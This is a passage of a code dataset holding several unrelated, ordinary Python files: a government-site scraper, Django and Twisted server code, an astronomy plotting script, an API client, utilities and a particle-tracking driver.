urllib.parse.urlencode(data).encode('utf-8') # convert data into urlencoded bytes\n    res = request.urlopen(url, data)\n    html = res.read().decode('utf-8')\n    return html\n\n\ndef post_page(areaCode):\n    url = 'http://www.fjbs.gov.cn/LiabilitiseAction.action'\n    data = {}\n    data['fn'] = 'getPowerList'\n    data['areaCode'] = areaCode\n    data['type'] = ''\n    data['keyword'] = ''\n    data['pageSize'] = '10'\n    data['pageNum'] = '1'\n    data = urllib.parse.urlencode(data).encode('utf-8')\n    res = request.urlopen(url, data)\n    htmlstr = res.read().decode('utf-8')\n    html = re.findall(r'\"totalCount\":(\\d+?),\"',htmlstr)\n    page = math.ceil(int(html[0])/10)\n    return(page)\n\n\ndef post_main_id(page,areaCode):\n    url = 'http://www.fjbs.gov.cn/LiabilitiseAction.action'\n    data = {}\n    data['fn'] = 'getPowerList'\n    data['areaCode'] = areaCode\n    data['type'] = ''\n    data['keyword'] = ''\n    data['pageSize'] = '10'\n    data['pageNum'] = page\n    data = urllib.parse.urlencode(data).encode('utf-8')\n    res = request.urlopen(url, data)\n    htmlstr = res.read().decode('utf-8')\n    main_unid = re.findall(r'\"UNID\":\"(.+?)\"',htmlstr )\n    name = re.findall(r'\"LIABILITISENAME\":\"(.+?)\"',htmlstr )\n    return main_unid,name\na ,b = post_main_id(\"8\",\"C50CC497199113B0B75501D50329B327\")\npass\n\ndef post_Branch_id(areaCode,main_unid): # branch ids\n    url = 'http://www.fjbs.gov.cn/LiabilitiseAction.action'\n    data = {}\n    data['fn'] = 'getPowerSubByNameOther'\n    data['areaCode'] = areaCode\n    data['keyword'] = ''\n    data['powerunids'] = main_unid\n    data['stype'] = ''\n    data = urllib.parse.urlencode(data).encode('utf-8')\n    res = request.urlopen(url, data)\n    htmlstr = res.read().decode('utf-8')\n    return(htmlstr)\n\n\ndef arecode(url): # collect arecode values\n    htmlstr = url_open(url).decode(\"utf-8\")  # open the page and decode it into readable form (charset)\n    html = etree.HTML(htmlstr)  # convert into a format XPath can understand\n    arecode_id = html.xpath('//*[@id=\"deptDataList\"]/li/@id')  # use XPath to extract nodes and pick out the URLs\n    for i in range(len(arecode_id)):\n        arecode_id[i] = arecode_id[i][5:]\n    return(arecode_id)\n\ndef turn(li):\n    out = \"\"\n    for i in li:\n        out = out +i +\",\"\n    return out[:-2]\n\ndef getbsd(sbs):\n    try:\n        result_law = requests.post(\"http://172.16.4.63:8080/intelligent/rightsApi/getLawInfo\",data={\"setBasisSummary\": sbs})\n    except:\n        print(\"VPN connection dropped\")\n        
result_law = requests.post(\"http://172.16.4.63:8080/intelligent/rightsApi/getLawInfo\",data={\"setBasisSummary\": sbs})\n    result_law_j = result_law.json()\n    result = list()\n    if result_law_j[\"state\"] ==1:\n        for i in range(0,len(result_law_j[\"result\"])):\n            for j in range(0,len(result_law_j[\"result\"][i]['articles'])):\n                try:\n                    clause = result_law_j[\"result\"][i][\"articles\"][j][\"clause\"]\n                except IndexError:\n                    clause = \"\"\n                try:\n                    content = result_law_j[\"result\"][i][\"articles\"][j][\"content\"]\n                except IndexError:\n                    content = \"\"\n                try:\n                    law = result_law_j[\"result\"][i][\"lawName\"]\n                except :\n                    law = \"\"\n                result.append(\n                    {\n                        \"clause\":clause,\n                        \"law\":law,\n                        \"content\":content\n                    }\n                )\n    return result\n\n\ndef main():\n    num = 0\n    rightType = [\"行政许可\", \"行政处罚\", \"行政强制\", \"行政征收\", \"行政裁决\", \"行政确认\", \"行政给付\", \"行政奖励\", \"行政检查\", '行政服务' ,'内部审批','其他职责事项', '行政征用',\"其他行政权力\"]\n    rightType_code = ['XK', 'CF','QZ','ZS','CJ', 'QR', 'GF','JL', 'JC','FW', 'NS', 'QL', 'ZY', 'QT']\n    rightcode = {}\n    for i in range(14):\n        rightcode[rightType_code[i]] = rightType[i]\n    os.chdir('C:/Users/Administrator/Desktop/') # set the working directory\n    with open(\"福建3.json\",\"w\",encoding = \"utf-8\") as json_file: # open the output json file\n        url = 'http://www.fjbs.gov.cn/LiabilitiseAction.action'\n        arecode_id = arecode(url)\n        for i in range(26,len(arecode_id)): # i indexes each arecode\n            pages = post_page(arecode_id[i]) # get the number of pages\n            print(\"total \",pages,\" pages\")\n            for page in range(pages):\n                print(\"page\",page)\n                html_1 = post_id(page,arecode_id[i]) # content of each main listing page\n                main_unid,rightName = post_main_id(page, arecode_id[i])\n                for j in range(len(main_unid)):\n                    if rightName[j] ==\"\\\",\":\n                        continue\n                    url = \"http://www.fjbs.gov.cn/LiabilitiseAction.action?fn=getPowerDetail&powerunid=\"+main_unid[j]\n                    html = url_open(url).decode()\n                    html = lxml.html.fromstring(html)\n                    data = html.cssselect('td')\n                    if len(data) == 81:\n                        rightNo = data[64].text_content().replace(\" \",\"\").replace(\" \",\"\")\n                        rightType = data[62].text_content().replace(\" \",\"\").replace(\" \",\"\")\n                        competentDeptName = data[85-17].text_content().replace(\" \",\"\").replace(\" \",\"\")\n                        law = data[89-17].text_content().replace(\" \",\"\").replace(\" \",\"\")\n                        try:\n                            aa = requests.post('http://172.16.4.63:8080/intelligent/rightsApi/getCaseDomain',\n                                               data={'competentDeptName': competentDeptName[j]}).json()\n                            caseDomainDescribe = aa['result']['industryShowName']\n                            caseDomain = aa['result']['industryName']\n                        except:\n                            caseDomain = \"\"\n                            caseDomainDescribe = \"\"\n                        dic = {\n                            \"rightNo\": rightNo,\n                            \"rightName\": rightName[j].replace(\"\\\\n\",'').replace(\"\\n\",''),\n                            \"rightType\": rightType,\n                            \"projectDecomposition\": \"\",\n                            \"executorName\": '',\n                            \"competentDeptName\": competentDeptName, #####\n                            \"undertakingAgency\": \"\", # undertaking agency\n                            \"jointImpDept\": \"\",\n                            \"timeLimit\": \"\",\n                            \"accessWay\": \"\",\n                            \"complaintTel\": \"\",\n                            \"undertakingUser\": \"\",\n                            \"consultationTel\": \"\",\n                            \"setBasisSummary\": law.replace(\"\\\\n\",'').replace(\"\\n\",''),\n                            \"setBasis\": law.replace(\"\\\\n\",'').replace(\"\\n\",''),\n                            \"feeBasis\": \"\",\n                            \"law\": \"\",\n                            \"article\": \"\",\n                            \"feeScale\": \"\",\n                            \"approveImpDoc\": \"\",\n                            \"cityCode\": \"350000\", ####################################### differs by city\n                            \"geoname\": \"福建\",\n                            \"sourceUrl\": url,\n                            \"caseDomain\": caseDomain,\n                            \"caseDomainDescribe\": caseDomainDescribe,\n                            \"basisSummaryDefinition\": getbsd(law.replace(\"\\\\n\",'').replace(\"\\n\",'')),\n                            \"uniqueId\": 
str(requests.post(\"http://172.16.4.63:8080/intelligent/rightsApi/getUniqid\",\n                                                         data={'uniqueidStr': \"350000\" + rightNo}).json()[\n                            \"result\"])\n                    }\n                    num += 1\n                    print(num)\n                    json.dump(dic, json_file)\n                    json_file.write(\"\\n\")\n                main_unid = turn(main_unid)\n                html_2 = post_Branch_id(arecode_id[i],main_unid)\n                law = re.findall(r'\"ACCORDING\":\"(.+?){0,1}\",\"',html_2)\n                citycode = re.findall(r'\"DEPTCODE\":\"(\\d+?){0,1}\"', html_2)\n                executorName = re.findall(r'\"EXECUTORCOMMON\":\"(.+?){0,1}\"', html_2)\n                competentDeptName = re.findall(r'\"DEPTNAME\":\"(.+?){0,1}\"', html_2)\n                uniqueId = re.findall(r'\"UNID\":\"(.+?){0,1}\"', html_2)\n                rightType = re.findall(r'\"STYPE\":\"(\\w+?){0,1}\"', html_2)\n                rightName = re.findall(r'\"SUBNAME\":\"(.+?){0,1}\",\"', html_2)\n                rightNo = re.findall(r'\"MATTERCODE\":\"(.+?){0,1}\"',html_2)\n                for j in range(len(rightType)):\n                    if rightName[j] ==\"\\\",\":\n                        continue\n                    try:\n                        aa = requests.post('http://172.16.4.63:8080/intelligent/rightsApi/getCaseDomain',\n                                           data={'competentDeptName': competentDeptName[j]}).json()\n                        caseDomainDescribe = aa['result']['industryShowName']\n                        caseDomain = aa['result']['industryName']\n                    except:\n                        caseDomain = \"\"\n                        caseDomainDescribe = \"\"\n                    dic = {\n                        \"rightNo\": rightNo[j],\n                        \"rightName\": rightName[j].replace(\"\\\\n\",'').replace(\"\\n\",''),\n                        \"rightType\": rightcode[rightType[j]],\n                        \"projectDecomposition\": \"\",\n                        \"executorName\": executorName[j],\n                        \"competentDeptName\": competentDeptName[j], #####\n                        \"undertakingAgency\": \"\", # undertaking agency\n                        \"jointImpDept\": \"\",\n                        \"timeLimit\": \"\",\n                        \"accessWay\": \"\",\n                        \"complaintTel\": \"\",\n                        \"undertakingUser\": \"\",\n                        \"consultationTel\": \"\",\n                        \"setBasisSummary\": law[j].replace(\"\\\\n\",'').replace(\"\\n\",''),\n                        \"setBasis\": law[j].replace(\"\\\\n\",'').replace(\"\\n\",''),\n                        \"feeBasis\": \"\",\n                        \"law\": \"\",\n                        \"article\": \"\",\n                        \"feeScale\": \"\",\n                        \"approveImpDoc\": \"\",\n                        \"cityCode\": \"350000\", ####################################### differs by city\n                        \"geoname\": \"福建\",\n                        \"sourceUrl\": \"http://www.fjbs.gov.cn/LiabilitiseAction.action?fn=getPowerDetail&powerunid=\"+uniqueId[j],\n                        \"caseDomain\": caseDomain,\n                        \"caseDomainDescribe\": caseDomainDescribe,\n                        \"basisSummaryDefinition\": getbsd(law[j].replace(\"\\\\n\",'').replace(\"\\n\",'')),\n                        \"uniqueId\": str(requests.post(\"http://172.16.4.63:8080/intelligent/rightsApi/getUniqid\",\n                                                      data={'uniqueidStr': \"350000\" + rightNo[j]}).json()[\n                            \"result\"])\n                    }\n                    if dic[\"executorName\"] == \"\\\",\":\n                        dic[\"executorName\"] = \"\"\n                    num += 1\n                    print(num)\n                    json.dump(dic, json_file)\n                    json_file.write(\"\\n\")\n            # fetched the content of all branch pages\n\n    pass\nmain()","sub_path":"venv/Include/福建.py","file_name":"福建.py","file_ext":"py","file_size_in_byte":12293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} {"seq_id":"552504399","text":"import re\nfrom datetime import date, datetime, timedelta\n\nfrom standup.database.helpers import paginate as _paginate\n\n\ndef paginate(statuses, page=1, startdate=None, enddate=None):\n    from standup.apps.status.models import Status\n    if startdate:\n        statuses = statuses.filter(Status.created >= startdate)\n    if enddate:\n        statuses = statuses.filter(Status.created <= enddate)\n    return _paginate(statuses, int(page))\n\n\ndef startdate(request):\n    dates = request.args.get('dates')\n    day = request.args.get('day')\n    if dates == '7d':\n        return date.today() - timedelta(days=7)\n    elif dates == 'today':\n        return date.today()\n    elif isday(day):\n        return get_day(day)\n    
return None\n\n\ndef enddate(request):\n    day = request.args.get('day')\n    if isday(day):\n        return get_day(day) + timedelta(days=1)\n    return None\n\n\ndef isday(day):\n    return day and re.match(r'^\\d{4}-\\d{2}-\\d{2}$', day)\n\n\ndef get_day(day):\n    return datetime.strptime(day, '%Y-%m-%d')\n","sub_path":"standup/apps/status/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} {"seq_id":"157078576","text":"from django.contrib.auth.models import User\nfrom django.utils.translation import ugettext_lazy\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\n\nfrom onadata.apps.logger.models import Instance, XForm\nfrom onadata.libs.utils.model_tools import queryset_iterator\n\n\nclass Command(BaseCommand):\n    args = ''\n    help = ugettext_lazy(\"Sync account with '_id'\")\n\n    def handle(self, *args, **kwargs):\n\n        # username\n        if args:\n            users = User.objects.filter(username__contains=args[0])\n        else:\n            # All the accounts\n            self.stdout.write(\"Fetching all accounts\", ending='\\n')\n            users = User.objects.exclude(\n                username__iexact=settings.ANONYMOUS_DEFAULT_USERNAME\n            )\n\n        for user in queryset_iterator(users):\n            self.add_id(user)\n\n    def add_id(self, user):\n        self.stdout.write(\"Syncing for account {}\".format(user.username),\n                          ending='\\n')\n        xforms = XForm.objects.filter(user=user)\n\n        count = 0\n        failed = 0\n        for instance in Instance.objects.filter(\n                xform__downloadable=True, xform__in=xforms)\\\n                .extra(where=['(\"logger_instance\".json->>%s) is null'],\n                       params=[\"_id\"]).iterator():\n            try:\n                instance.save()\n                count += 1\n            except Exception as e:\n                failed += 1\n                self.stdout.write(str(e), ending='\\n')\n\n        self.stdout.write(\"Syncing for account {}. Done. 
Success {}, Fail {}\"\n .format(user.username, count, failed),\n ending='\\n')\n","sub_path":"onadata/apps/logger/management/commands/add_id.py","file_name":"add_id.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"51399542","text":"import matplotlib.pyplot as plt\r\nimport matplotlib.colors as colors\r\nimport numpy as np\r\n\r\nimport csv, glob, os, pandas\r\nfrom functools import reduce\r\n\r\nvar_Gc, var_logAge, var_M_H, var_m_ini, var_mu0, var_Av, var_comp, var_Mass, var_logL, var_logTe, var_logg, var_McoreTP, var_C_O, var_period0, var_period1, var_pmode, var_Mloss, var_tau1m, var_X, var_Y, var_Xc, var_Xn, var_Xo, var_Cexcess, var_Z, var_mbolmag, var_FUVmag, var_NUVmag, var_Umag, var_Bmag, var_Vmag, var_umag, var_gmag, var_rmag, var_imag, var_zmag, var_gP1mag, var_rP1mag, var_iP1mag, var_zP1mag, var_yP1mag, var_wP1mag, var_Gmag, var_G_BPmag, var_G_RPmag, var_Jmag, var_Hmag, var_Ksmag=range(48)\r\n\r\ncols=[var_logTe, var_logg, var_NUVmag, var_gmag, var_imag]\r\n[var_logTe, var_logg, var_NUVmag, var_gmag, var_imag]=range(len(cols))\r\n\r\ndef coords(line): return line.split(\"trioutput_b\")[1].split(\"binary\")[0].split(\"_l\")\r\n\r\ndef truncate_colormap(cmap, minval=0.0, maxval=1.0, n=256):\r\n new_cmap = colors.LinearSegmentedColormap.from_list(\r\n 'trunc({n},{a:.2f},{b:.2f})'.format(n=cmap.name, a=minval, b=maxval),\r\n cmap(np.linspace(minval, maxval, n)))\r\n return new_cmap\r\n\r\n\r\n\r\ndef save_rows(filename, rows):\r\n np.save(filename, rows)\r\n\r\ndef load_rows(filename):\r\n return np.load(filename)\r\n\r\n\r\ndef extract_rows(files, m=None):\r\n # only process first m datasets to speedup processing\r\n if m==None: m=len(files)\r\n return np.vstack(pandas.io.parsers.read_csv(f, delimiter=\",\", skiprows=1, usecols=cols).values for f in files[:m])\r\n \r\n\r\ndef get_IFMR_data(IFMR, m=20):\r\n \"\"\"\r\n returns list of every row with that IFMR\r\n each row stored as a dict\r\n \"\"\"\r\n global datasets_dir, color_dir\r\n \r\n files = glob.glob(os.path.join(datasets_dir, \"*IFMR{}.csv\".format(IFMR)))\r\n \r\n rows = extract_rows(files, m=m)\r\n return rows\r\n \r\ndef make_color_plots(IFMR, rows, NUV_cutoff):\r\n col = rows[np.where(rows.T[var_NUVmag] <= NUV_cutoff)].T\r\n \r\n plt.clf()\r\n # vmin, vmax = range of logTe used to map a logTe value to a color w/ my colormap\r\n # manually set so the color scale doesn't change w/ the dataset\r\n plt.scatter(col[var_gmag]-col[var_imag], col[var_NUVmag]-col[var_gmag], c=col[var_logTe], \r\n marker=',', s=1,\r\n linewidth=0, edgecolors='', \r\n cmap=reduced_cmap, vmin=3.5, vmax=5)\r\n \r\n plt.title(\"POINT-LIKE, NUV mag $\\leq$ {}, IFMR {} 60-90N\".format(NUV_cutoff, IFMR))\r\n a=plt.gca()\r\n a.get_yaxis().set_tick_params(direction='out')\r\n a.get_xaxis().set_tick_params(direction='out')\r\n a.tick_params(which='both', \r\n labeltop='off', labelright='off',\r\n top='off', right='off')\r\n a.set_xlabel(\"g - i\")\r\n a.set_ylabel(\"NUV - g\")\r\n #a.set_xlim(-1.5, 4)\r\n #a.set_ylim(-1.5, 12)\r\n a.set_xlim(-1, 2)\r\n a.set_ylim(-1.5, 4)\r\n a.invert_yaxis()\r\n plt.savefig(os.path.join(color_dir, \"{} NUV cutuff {}\".format(IFMR, NUV_cutoff) + \".png\"), bbox_inches='tight', dpi=500)\r\n plt.show()\r\n \r\n\r\n\r\n#reduced_cmap = truncate_colormap(plt.cm.CMRmap, 0.2, 0.6)\r\nreduced_cmap = truncate_colormap(plt.cm.spectral, 1, 0)\r\n\r\ndatasets_dir = \"D:/Documents/Research/Astro/output/\"\r\ncolor_dir = 
\"D:/Documents/Research/Astro/color maps\"\r\n \r\n#for IFMR in (\"kalirai2008\", \"williams2007\", \"weideman2000\" ):\r\nfor IFMR in [\"williams2007\"]:\r\n \r\n # load datasets\r\n save_filename = os.path.join(datasets_dir, \"combined_{}\".format(IFMR))\r\n if 1:\r\n rows = get_IFMR_data(IFMR, m=None)\r\n save_rows(save_filename, rows)\r\n print(\"rows saved\")\r\n else:\r\n rows = load_rows(save_filename + \".npy\")\r\n \r\n #for NUV in range(19, 26, 2):\r\n make_color_plots(IFMR, rows, 19)\r\n \r\n","sub_path":"color_diagrams.py","file_name":"color_diagrams.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"303090280","text":"\"\"\"\nService class\n------------------\nService object for interfacing with the Phenoteke API\n\n\"\"\"\n\nimport os\nimport logging\nfrom posixpath import join as urljoin\nfrom typing import Optional, List, Union, Dict\n\nfrom ...client import Client\nfrom ...services import BaseService\n\nSERVICE_PATH = \"phenoteke/api/v1\"\n\nlog = logging.getLogger(__file__)\n\nclass Service(BaseService):\n \"\"\"\n Phenoteke Service\n \"\"\"\n\n links: Dict = {}\n\n def __init__(self, client: Client, *args, **kwargs) -> None:\n super(Service, self).__init__(client, SERVICE_PATH, *args, **kwargs)\n\n def map_cids_to_ipns(\n self,\n site_id: str,\n study_id: str,\n cids: List[str],\n subcategory_id: Optional[str] = None,\n ) -> List:\n \"\"\"\n Get mapping from collaborator ids to ipns\n\n :param site_id: Site code\n :param study_id: Study code\n :param cids: List of collaborator ids\n :param subcategory_id: Optional sub category within study\n :return: List of {\"cid\": , \"ipn\": }\n :raises: ServerError\n \"\"\"\n uri = urljoin(\n self.session.url_from_endpoint(\"root\"),\n \"cids_to_ipns_mapping\",\n )\n result = []\n parts = int((len(cids)+4)/5)\n\n payload = {\n \"site_id\": site_id,\n \"study_id\": study_id,\n }\n if subcategory_id:\n payload[\"subcategory_id\"] = subcategory_id\n\n def list_split(l, parts):\n length = len(l)\n return [ l [i*length // parts: (i+1)*length // parts] for i in range(parts) ]\n\n for cid_parts in list_split(cids,parts):\n payload[\"cids\"] = cid_parts\n\n resp = self.session.post(uri, json=payload)\n resp.raise_for_status()\n data = resp.json()\n result.extend(data[\"data\"])\n\n return result\n\n","sub_path":"nextcode/services/phenoteke/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"468113401","text":"import sys\nfrom optparse import OptionParser\nfrom twisted.python import log\nfrom twisted.internet import reactor\n\nfrom generic.genericserver import FixedLengthMessageServer\nfrom generic.protocol import BinaryMessageProtocol\nfrom storage.handler import StorageRequestHandler\nfrom storage.storagedb import StorageDatabase\nfrom storage.admin import StorageAdminServer\n\nDEFAULT_DB_SIZE = 500*1024*1024 # 10mb, small for testing\n\nclass StorageServer(FixedLengthMessageServer):\n def __init__(self, options, args):\n super(StorageServer, self).__init__(options, args)\n self.factory.db = StorageDatabase(options.databasefile, options.databasesize)\n self.factory.db.start()\n self.factory.handlerClass = StorageRequestHandler\n self.factory.protocol = BinaryMessageProtocol\n self.factory.protocolVersion = 0b1\n self.factory.xor_server_connection = None\n\nif __name__ == '__main__':\n parser = OptionParser()\n 
StorageServer.addServerOptions(parser)\n \n parser.add_option(\"-d\", \"--db\", dest=\"databasefile\", default=\"storagedb.bin\", help=\"loctation of database file\", metavar=\"FILE\")\n parser.add_option(\"-s\", \"--dbsize\", dest=\"databasesize\", type=\"int\", default=DEFAULT_DB_SIZE, help=\"size of database in bytes\")\n \n parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\")\n \n parser.add_option(\"-a\", \"--adminport\", type=\"int\", dest=\"admin_port\", help=\"Port of admin server\")\n \n \n (options, args) = parser.parse_args()\n \n if options.verbose:\n log.startLogging(sys.stdout)\n \n server = StorageServer(options, args)\n server.listen()\n adminServer = StorageAdminServer(options, args, server)\n adminServer.listen()\n reactor.run()\n","sub_path":"Distributed Systems/src/storageserver.py","file_name":"storageserver.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"617574686","text":"n = int(input())\na = list(map(int, input().split()))\ntotal = sum(a)\nlimit = 10**9 + 10**9\nb = 0\nfor i in a[:-1]:\n b += i + i\n diff = abs(total - b)\n if limit > diff:\n limit = diff\nprint(limit)","sub_path":"Python_codes/p03659/s513257801.py","file_name":"s513257801.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"524081195","text":"import os\n\nimport platform\nimport logging\nimport psutil\n\n\ndef create_dirs(path):\n os.makedirs(os.path.join(path, 'snapshots/'))\n\n\ndef get_video_params():\n system = platform.system()\n\n if system == 'Windows':\n # give process higher priority\n import psutil\n import os\n p = psutil.Process(os.getpid())\n p.nice(psutil.REALTIME_PRIORITY_CLASS)\n return 'mp4v', '.mp4'\n elif system == 'Darwin':\n return 'mp4v', '.mov'\n elif system == 'Linux':\n return 'XVID', '.avi'\n\n\ndef next_test_dir(path):\n path = os.path.join(path, 'session')\n num = 0\n while os.path.exists(path + str(num)):\n num = num + 1\n test_dir = path + str(num) + '/'\n os.makedirs(test_dir)\n return test_dir\n\ndef is_latest():\n import subprocess\n try:\n current_commit_id = subprocess.check_output([\"git\", \"describe\", \"--always\"]).strip()\n\n remote_git = 'https://github.com/UpGado/polarized-laparoscope.git'\n remote_commit_id = subprocess.check_output([\"git\", \"ls-remote\", remote_git]).strip()\n\n same_id = remote_commit_id[:len(current_commit_id)] == current_commit_id\n return same_id\n except:\n return True\n\ndef enough_space():\n nbytes = psutil.disk_usage('.').free\n ngigabytes = nbytes / 2**(30)\n logging.info(f'Free space: {ngigabytes} GB')\n return ngigabytes > 200\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"250021361","text":"# # By Steven Kha 2018\n\nimport pygame\npygame.init()\nfrom pygame.sprite import Sprite\n\nclass Right_Paddle(Sprite):\n\n def __init__(self, ai_settings, screen):\n \"\"\"Create the Right_Paddle and set its starting position.\"\"\"\n super(Right_Paddle, self).__init__()\n self.screen = screen\n self.ai_settings = ai_settings\n\n self.rect = pygame.Rect(0, 0, ai_settings.right_paddle_width,\n ai_settings.right_paddle_height)\n\n self.screen_rect = screen.get_rect()\n\n self.color = 
ai_settings.top_paddle_color\n\n        self.height = float(ai_settings.right_paddle_height)\n\n        #Right_Paddle starts at center right of screen\n        self.rect.centery = self.screen_rect.centery\n        self.rect.right = self.screen_rect.right\n        #print(\"Right Paddle position: \" + str(self.rect))\n\n        # Store a decimal value for the paddle's center.\n        self.y = float(self.rect.centery)\n\n        self.speed_factor = ai_settings.right_paddle_speed_factor\n\n        # Movement flag for continuous movement\n        self.moving_up = False\n        self.moving_down = False\n\n    def update(self, ai_settings, balls):\n        \"\"\"Update the paddle's position to track the ball.\"\"\"\n        # Update the paddle's center value, not the rect.\n        for ball in balls.sprites():\n            if ball.rect.centerx > ai_settings.right_reflex:\n                self.y += (ai_settings.right_paddle_y_direction *\n                ai_settings.right_paddle_speed_factor/ ai_settings.cpu_slow)\n\n            else:\n                self.y -= (ai_settings.right_paddle_y_direction *\n                ai_settings.right_paddle_speed_factor/ ai_settings.cpu_slow)\n\n        self.rect.y = self.y\n\n    def check_edges(self):\n        if self.rect.top < 0:\n            return True\n        elif self.rect.bottom > 800:\n            return True\n\n    def center_right_paddle(self):\n        \"\"\"Center the paddle on the screen.\"\"\"\n        self.center = self.screen_rect.midright\n\n\n    def draw_right_paddle(self):\n        \"\"\"Draw the paddle to the screen.\"\"\"\n        pygame.draw.rect(self.screen, self.color, self.rect)\n\n# By Steven Kha 2018","sub_path":"right_paddle.py","file_name":"right_paddle.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} {"seq_id":"443459651","text":"\"\"\"\nCode for particle tracking, designed for ROMS output with\nplaid lat, lon grids.\n\nThis program is a driver where you specify:\n- an experiment (ROMS run + release locations + other choices)\n- a release or set of releases within that experiment (start day, etc.)\n\nIt can be run on its own, or with command line arguments to facilitate\nlarge, automated jobs, for example from the terminal:\npython tracker_1.py -dtt 2 -ds 2013.01.30\nor in ipython:\nrun tracker_1.py -dtt 2 -ds 2013.01.30\n\"\"\"\n\n#%% setup\nimport numpy as np\nfrom datetime import datetime, timedelta\nimport time\nimport netCDF4 as nc4\nimport argparse\nimport collections\n\nimport os\nimport sys\nalp = os.path.abspath('../alpha')\nif alp not in sys.path:\n    sys.path.append(alp)\nimport Lfun\nLdir = Lfun.Lstart()\n\nfrom importlib import reload\nimport trackfun_1 as tf1\nreload(tf1)\nimport trackfun_nc as tfnc\nreload(tfnc)\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# optional command line arguments, can be input in any order\nparser = argparse.ArgumentParser()\nparser.add_argument('-gx', '--gtagex', nargs='?', type=str)\nparser.add_argument('-ic', '--ic_name', nargs='?', type=str)\nparser.add_argument('-dir', '--dir_tag', nargs='?', type=str)\nparser.add_argument('-sfc', '--surface', nargs='?', type=bool)\nparser.add_argument('-trb', '--turb', nargs='?', type=bool)\nparser.add_argument('-wnd', '--windage', nargs='?', type=float)\nparser.add_argument('-ds', '--ds_first_day', nargs='?', type=str)\nparser.add_argument('-nsd', '--number_of_start_days', nargs='?', type=int)\nparser.add_argument('-dbs', '--days_between_starts', nargs='?', type=int)\nparser.add_argument('-dtt', '--days_to_track', nargs='?', type=int)\nargs = parser.parse_args()\na_dict = args.__dict__ \n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n# ************ USER INPUT 
**************************************\n# The values set in this section are effectively defaults, and\n# they will be overridden by the command line arguments.\n\n# (1) specify the experiment\n#\nexp_name = 'jdf5'\n#\nif exp_name == 'jdf5':\n gtagex = 'cascadia1_base_lobio5'\n ic_name = 'jdf0'\nelif exp_name == 'jdf6':\n gtagex = 'cas3_v0_lo6m'\n ic_name = 'jdf0'\nelif exp_name == 'hc5':\n gtagex = 'cascadia1_base_lobio5'\n ic_name = 'hc0'\nelif exp_name == 'hc6':\n gtagex = 'cas3_v0_lo6m'\n ic_name = 'hc0'\n#\n# other experiment choices\ndir_tag = 'forward' # 'forward' or 'reverse'\nsurface = True # Boolean, True to trap to surface\nturb = False # Vertical turbulent dispersion\nwindage = 0 # a small number 0 <= windage << 1 (e.g. 0.03)\n# fraction of windspeed added to advection, only for surface=True\nif surface == False:\n windage = 0 # override\n# additional choices, less likely to change\nndiv = 1 # number of divisions to make between saves for the integration\n # e.g. if ndiv = 3 and we have hourly saves, we use a 20 minute step\n # for the integration, but still only report fields hourly\n#\n# modify the experiment name, based on other choices\nif dir_tag == 'reverse':\n exp_name = exp_name + '_reverse'\nif surface:\n exp_name = exp_name + '_surf'\nif turb:\n exp_name = exp_name + '_turb'\nif windage > 0:\n exp_name = exp_name + '_wind'\n \n# (2) set release information\n# \n# You can make multiple releases using:\n# number_of_start_days > 1 & days_between_starts\n#\nds_first_day = '2013.01.29'\nnumber_of_start_days = 1\ndays_between_starts = 1\ndays_to_track = 1\n\n# routines to set particle initial locations, all numpy arrays\n#\n# first create three vectors of initial locations\n# plat00 and plon00 should be the same length,\n# and the length of pcs00 is however many vertical positions you have at\n# each lat, lon (expressed as fraction of depth -1 < pcs < 1)\n#\nif ic_name == 'hc0': # Hood Canal\n lonvec = np.linspace(-122.65, -122.45, 30)\n latvec = np.linspace(47.2, 47.35, 30)\n lonmat, latmat = np.meshgrid(lonvec, latvec)\n plon_vec = lonmat.flatten()\n plat_vec = latmat.flatten()\n pcs_vec = np.array([-.05])\nelif ic_name == 'jdf0': # Mid-Juan de Fuca\n lonvec = np.linspace(-123.85, -123.6, 20)\n latvec = np.linspace(48.2, 48.4, 20)\n lonmat, latmat = np.meshgrid(lonvec, latvec)\n plon_vec = lonmat.flatten()\n plat_vec = latmat.flatten()\n pcs_vec = np.array([-.05])\n \n# ********* END USER INPUT *************************************\n\nif args.gtagex != None:\n Ldir['gtagex'] = args.gtagex\nelse:\n Ldir['gtagex'] = gtagex\n\n# save some things in tr_dict\ntr_dict = collections.OrderedDict()\ntr_dict['exp_name'] = exp_name\ntr_dict['gtagex'] = gtagex\ntr_dict['ic_name'] = ic_name\ntr_dict['dir_tag'] = dir_tag\ntr_dict['surface'] = surface\ntr_dict['turb'] = turb\ntr_dict['windage'] = windage\ntr_dict['ndiv'] = ndiv\ntr_dict['ds_first_day'] = ds_first_day\ntr_dict['number_of_start_days'] = number_of_start_days\ntr_dict['days_between_starts'] = days_between_starts\ntr_dict['days_to_track'] = days_to_track\n\n# override using command line arguments\nfor k in a_dict.keys():\n if a_dict[k] != None:\n tr_dict[k] = a_dict[k]\n\n# make the full IC vectors, which will have equal length\n# (one value for each particle)\nif len(plon_vec) != len(plat_vec):\n print('Problem with length of initial lat, lon vectors')\n sys.exit()\nNSP = len(pcs_vec)\nNXYP = len(plon_vec)\nplon_arr = plon_vec.reshape(NXYP,1) * np.ones((NXYP,NSP))\nplat_arr = plat_vec.reshape(NXYP,1) 